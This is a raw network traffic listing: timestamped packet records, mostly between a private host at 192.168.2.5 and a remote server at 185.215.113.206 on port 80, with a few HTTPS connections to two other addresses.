Nov 12, 2024 00:06:27.668121099 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668129921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668164015 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668194056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668206930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668217897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668236017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668246984 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668248892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668268919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668278933 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668282032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668298006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668298960 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668312073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668323040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668323994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668334007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668343067 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668346882 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668359041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668364048 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668370962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668384075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668389082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668395996 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668407917 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668411970 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668423891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668430090 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668438911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668457985 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668481112 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668490887 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668492079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668505907 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668519020 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668533087 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668546915 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668546915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668574095 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668589115 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668906927 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668920040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668931007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668942928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668951035 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668955088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668967962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668978930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.668982029 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.668992043 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669007063 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669009924 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669018030 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669023037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669034004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669045925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669054985 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669055939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669070005 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669069052 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.669083118 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669089079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669095039 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669101954 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669109106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669121981 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669125080 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.669126034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669133902 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669146061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669152021 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669162035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669178009 CET	49850	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.669178009 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669198036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669203043 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669210911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669222116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669228077 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669239998 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669250965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669255018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669266939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669270039 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669286966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669296026 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669300079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669312954 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669322968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669326067 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669334888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669347048 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669349909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669358969 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669368029 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669373035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669384003 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669388056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.669413090 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669436932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.669574022 CET	49849	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.669589996 CET	443	49849	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.670248032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670268059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670279980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670290947 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670315981 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670363903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670376062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670392990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670403957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670413017 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670416117 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670422077 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670452118 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670631886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670644999 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670655966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670667887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670670986 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670680046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670689106 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670691013 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670703888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670710087 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670717001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670733929 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670734882 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670747995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670753956 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670759916 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670780897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670780897 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670809031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670814037 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670828104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670830965 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670840025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670852900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670859098 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670865059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670872927 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670878887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670891047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670897961 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670902967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670912027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670917034 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670931101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670942068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670943975 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670954943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670965910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670969963 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.670977116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670989037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.670989990 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671000957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671010971 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671014071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671025991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671029091 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671039104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671051979 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671053886 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671072960 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671080112 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671087027 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671087980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671101093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671113014 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671122074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671135902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671159983 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671749115 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671797037 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671839952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671853065 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671864033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671875000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671876907 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671885967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671895981 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671899080 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671909094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671912909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671942949 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671947002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671958923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671957016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671971083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671983957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671992064 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.671997070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.671999931 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.672010899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.672019005 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.672023058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.672034979 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.672045946 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.672046900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.672054052 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.672086000 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.673219919 CET	49847	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.673300028 CET	443	49847	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.673630953 CET	49847	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:27.673640013 CET	443	49847	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:27.673768997 CET	49850	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:27.673775911 CET	443	49850	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:27.674797058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.674841881 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.674953938 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.674966097 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.674977064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.674988985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675000906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675003052 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675019026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675030947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675040960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675043106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675055981 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675060034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675071955 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675082922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675084114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675095081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675106049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675112963 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675117016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675128937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675129890 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675143003 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675147057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675154924 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.675174952 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.675194979 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.677540064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677577972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677587986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677604914 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.677604914 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.677624941 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.677647114 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677658081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677669048 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677689075 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.677717924 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.677762985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677774906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677786112 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.677808046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.677829027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680624008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680674076 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680721998 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680733919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680768967 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680803061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680823088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680835009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680846930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680857897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680866003 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680870056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680882931 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680897951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680900097 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680913925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680922031 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680939913 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680955887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680963039 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.680969000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680980921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.680999994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681000948 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681015015 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681025028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681026936 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681040049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681052923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681054115 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681082964 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681085110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681094885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681103945 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681123972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681127071 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681135893 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681137085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681149960 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681155920 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681162119 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681174040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681174994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681185007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681194067 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681199074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681202888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681211948 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681221962 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681222916 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681236029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681243896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681256056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681257963 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681269884 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681281090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681286097 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681293964 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681303978 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681309938 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681315899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681327105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681337118 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681339979 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681351900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681356907 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681363106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681375027 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681387901 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681392908 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681410074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681418896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681421995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681427956 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681436062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681447983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681462049 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681463957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681476116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681487083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681488991 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681499958 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681504965 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681513071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681524038 CET	49758	80	192.168.2.5	185.215.113.206
